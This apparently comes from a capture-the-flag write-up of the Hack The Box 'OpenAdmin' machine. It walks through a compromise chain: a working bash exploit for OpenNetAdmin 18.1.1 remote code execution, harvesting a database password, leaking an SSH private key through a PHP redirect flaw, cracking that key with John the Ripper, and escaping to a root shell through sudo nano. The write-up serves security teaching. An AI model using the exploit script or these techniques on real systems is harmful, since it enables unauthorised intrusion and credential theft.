OpenAdmin is an easy difficulty box from Hack The Box that starts off by finding an instance of OpenNetAdmin. This application is known to be vulnerable to a remote code execution, which then can be leveraged to gain a foothold on the system and then obtain a reused database credentials. The first user has an access to web resources that is is currently hosted internally. The internal web has a logic flaw that allows me to obtain the SSH key of the second user. The second user is allowed to run a nano editor with sudo privileges, this can be abused to gain root access.
Reconnaissance
I’ll start with port scanning using nmap
Nmap
nmap -sV -sC -oA OpenAdmin 10.10.10.171- -sC, to scan with default script
- -sV, to scan service version
- -oN, to save the output to .nmap file
- -V, to verbose during the scan.
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
From the scan results, nmap found two open ports:
- An SSH service running on port 22
- An HTTP service running on port 80
Also from the scan above, the machine is likely running Ubuntu.
As SSH usually requires valid credentials and there’s is no straight exploit yet, hence further enumeration is needed.
Enumeration
TCP 80 — Website
Visiting port 80 only displays the default Apache page.
Directory Brute Force
Performing directory brute force on the web using dirb discovered a few hidden web directories.
$ dirb http://openadmin.htb/ /usr/share/wordlists/dirb/common.txt -r... <snip> ...
---- Scanning URL: http://openadmin.htb/ ----
==> DIRECTORY: http://openadmin.htb/artwork/
+ http://openadmin.htb/index.html(CODE:200|SIZE:10918)
==> DIRECTORY: http:/openadmin.htb/music/
+ http://openadmin.htb/server-status (CODE:200|SIZE:278)
... <snip> ...
:: http://openadmin.htb/artwork/
:: http://openadmin.htb/music/
The /music home page provides a login menu that points to http://openadmin.htb/ona
:: /ona
Visiting /ona/ brings me to an instance of OpenNetAdmin. It is a software for managing network related things.
There’s a warning on the page. It’s complaining about not running the latest version compared to the one currently in use (v18.1.1)
Foothold
Exploit PoC for OpenNetAdmin 18.1.1
Based on the version above, a quick search on exploit-db shows that the current instance of OpenNetAdmin is vulnerable to Remote Code Execution. The exploit poc source code is as follows:
OpenRCE.sh
#!/bin/bashURL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
The exploit PoC is saved as OpenRCE.sh and below is the issued command to run the exploit.
./OpenRCE.sh http://openadmin.htb/ona/
Shell as jimmy
Upon enumerating the current working directory, a database credential is found in ./local/config/database_settings.inc.php.
$ cat /opt/ona/www/local/config/database_settings.inc.php
<?php$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
These are two users available in /home directory.
$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:,,,:/home/joanna:/bin/bashThe password from database config is reused by user jimmy. But the user flag can not be found in jimmy’s home directory.
The find command is issued to search files that is accessible or owned by user jimmy.
find / -type f -user jimmy 2>/dev/nullIt successfully reveals that user jimmy has access to files in /var/www/internal/.
Based on apache config, /var/www/internal is currently hosted locally on port 52846.
$ cat /etc/apache2/sites-enabled/internal.conf
Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>Code review — Improper Redirection
After inspecting the main.php source code from /var/www/internal/, a logic flaw was found on the first line.
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>This line code has an improper redirection.
<?php session_start();
if (!isset ($_SESSION['username'])) {
header("Location: /index.php");
};...<snip>...
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
...<snip>...
The code above checks users’ sessions but it’s not complete yet because the die() or exit() function is missing, so the rest of the code below will be executed as well
Therefore, sending a normal request with curl (default without -L option) will prevent the page from redirection and then it renders joanna's SSH key.
jimmy@openadmin:~$ curl -s http://127.0.0.1:52846/main.php
Cracking SSH Password
The private key is encrypted with a password. JtR can be used to crack an encrypted SSH key, but first, it must be converted to the hash form and this can be done by using ssh2john.py
python ssh2john.py joanna_rsa > joanna_rsa.hashOnce the hash copied to my Windows, the cracking is attempted using John-the-Ripper.
Shell as joanna
I successfully logged in as user joanna via SSH using the cracked password.
ssh -i joanna_rsa joanna@10.10.10.171
User flag is done here.
Privilege Escalation
Abusing sudo nano
User joanna has sudo privileges on /bin/nano
On linux boxes, whenever you own a valid user password, always check
sudo -l!
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
A quick way to read the root flag is by issuing the command below,
joanna@openadmin:~$ sudo /bin/nano /opt/privand then hit CTRL + R to open a file, this allows us to read the root flag /root/root.txt
From GTFOBins page, escalation from user joanna to gain root shell as follows:
joanna@openadmin:~$ sudo /bin/nano /opt/priv # Opening nano as root
^R^X # CTRL+R (read/open file), CTRL+X(execute command)
reset; sh 1>&0 2>&0 # Escape from nano